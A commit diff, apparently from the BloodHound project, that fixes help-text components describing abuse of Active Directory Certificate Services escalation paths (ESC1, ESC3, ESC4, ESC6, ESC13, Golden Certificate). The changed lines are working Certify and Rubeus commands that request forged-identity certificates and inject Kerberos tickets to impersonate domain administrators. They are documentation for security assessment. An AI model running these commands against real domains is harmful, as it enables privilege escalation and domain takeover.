docs: fix certify and rubeus commands (#646)

SpecterOps · Jun 10, 2024 · 94bf536 · 94bf536
1 parent dffec24
commit 94bf536
Show file tree

Hide file tree

Showing 7 changed files with 14 additions and 10 deletions.
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC1/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC1/WindowsAbuse.tsx
@@ -27,7 +27,7 @@ const WindowsAbuse: FC = () => {
             </Typography>
             <Typography component={'pre'}>
                 {
-                    'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:"ESC1" /altname:forestroot\\ForestRootDA'
+                    'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:"ESC1" /altname:forestrootda /sidextension:S-1-5-21-2697957641-2271029196-387917394-500'
                 }
             </Typography>
             <Typography variant='body2'>Save the certificate as cert.pem and the private key as cert.key.</Typography>
@@ -44,7 +44,7 @@ const WindowsAbuse: FC = () => {
                 target identity to impersonate and the PFX-formatted certificate created in Step 2:
             </Typography>
             <Typography component={'pre'}>
-                {'Rubeus asktgt /user:"forestroot\\forestrootda" /certificate:cert.pfx /password:asdf /ptt'}
+                {'Rubeus asktgt /user:forestrootda /domain:forestroot.com /certificate:cert.pfx /password:asdf /ptt'}
             </Typography>
             <Typography variant='body2'>
                 <b>Step 5</b>: Optionally verify the TGT by listing it with the klist command:

diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC13/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC13/WindowsAbuse.tsx
@@ -53,7 +53,7 @@ const WindowsAbuse: FC = () => {
                 attacker identity, the PFX-formatted certificate created in Step 2, and the certificate password:
             </Typography>
             <Typography component={'pre'}>
-                {'Rubeus asktgt /user:"forestroot\\attacker" /certificate:cert.pfx /password:asdf /ptt'}
+                {'Rubeus asktgt /user:attacker /domain:forestroot.com /certificate:cert.pfx /password:asdf /ptt'}
             </Typography>
             <Typography variant='body2'>
                 <b>Step 5</b>: Optionally verify the TGT by listing it with the klist command:

diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC3/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC3/WindowsAbuse.tsx
@@ -87,7 +87,7 @@ const WindowsAbuse: FC = () => {
                 impersonate and the PFX-formatted certificate created in Step 4.
             </Typography>
             <Typography component={'pre'}>
-                {'Rubeus.exe asktgt /user:CORP\\itadmin /certificate:itadminenrollment.pfx'}
+                {'Rubeus.exe asktgt /user:itadmin /domain:corp.local /certificate:itadminenrollment.pfx'}
             </Typography>
         </>
     );

diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC4/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC4/WindowsAbuse.tsx
@@ -592,7 +592,7 @@ const WindowsAbuse: FC = () => {
             </Typography>
             <CodeController>
                 {
-                    'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:"ESC1" /altname:forestroot\\ForestRootDA'
+                    'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:"ESC1" /altname:forestrootda /sidextension:S-1-5-21-2697957641-2271029196-387917394-500'
                 }
             </CodeController>
             <Typography variant='body2'>Save the certificate as cert.pem and the private key as cert.key.</Typography>
@@ -623,7 +623,7 @@ const WindowsAbuse: FC = () => {
                 target identity to impersonate and the PFX-formatted certificate created in Step 7:
             </Typography>
             <CodeController>
-                {'Rubeus asktgt /user:"forestroot\\forestrootda" /certificate:cert.pfx /password:asdf /ptt'}
+                {'Rubeus asktgt /user:forestrootda /domain:forestroot.com /certificate:cert.pfx /password:asdf /ptt'}
             </CodeController>
         </>
     );

diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6a/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6a/WindowsAbuse.tsx
@@ -27,7 +27,7 @@ const WindowsAbuse: FC = () => {
             </Typography>
             <Typography component={'pre'}>
                 {
-                    '.\\Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:ESC6 /altname:forestroot\\ForestRootDA'
+                    '.\\Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:ESC6 /altname:forestrootda'
                 }
             </Typography>
             <Typography variant='body2'>
@@ -48,7 +48,9 @@ const WindowsAbuse: FC = () => {
                 target identity to impersonate and the PFX-formatted certificate created in Step 2:
             </Typography>
             <Typography component={'pre'}>
-                {'.\\Rubeus.exe asktgt /certificate:cert.pfx /user:”forestroot\\forestrootda” /password:asdf /ptt'}
+                {
+                    '.\\Rubeus.exe asktgt /certificate:cert.pfx /user:forestrootda /domain:forestroot.com /password:asdf /ptt'
+                }
             </Typography>
             <Typography variant='body2'>
                 <b>Step 4</b>: Optionally verify the TGT by listing it with the klist command:

diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6b/WindowsAbuse.tsx
@@ -30,7 +30,7 @@ const WindowsAbuse: FC = () => {
             </Typography>
             <Typography component={'pre'}>
                 {
-                    '.\\Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:ESC6 /altname:forestroot\\ForestRootDA'
+                    '.\\Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:ESC6 /altname:forestrootda'
                 }
             </Typography>
             <Typography variant='body2'>

diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/WindowsAbuse.tsx
@@ -60,7 +60,9 @@ const Abuse: FC = () => {
                 <br />
                 2) Request a TGT for the targeted principal using the certificate with Rubeus:
                 <Typography component={'pre'}>
-                    {'Rubeus.exe asktgt /user:Roshi /certificate:target.pfx /password:NewPassword123!'}
+                    {
+                        'Rubeus.exe asktgt /user:Roshi /domain:dumpster.fire /certificate:target.pfx /password:NewPassword123!'
+                    }
                 </Typography>
             </Typography>
         </>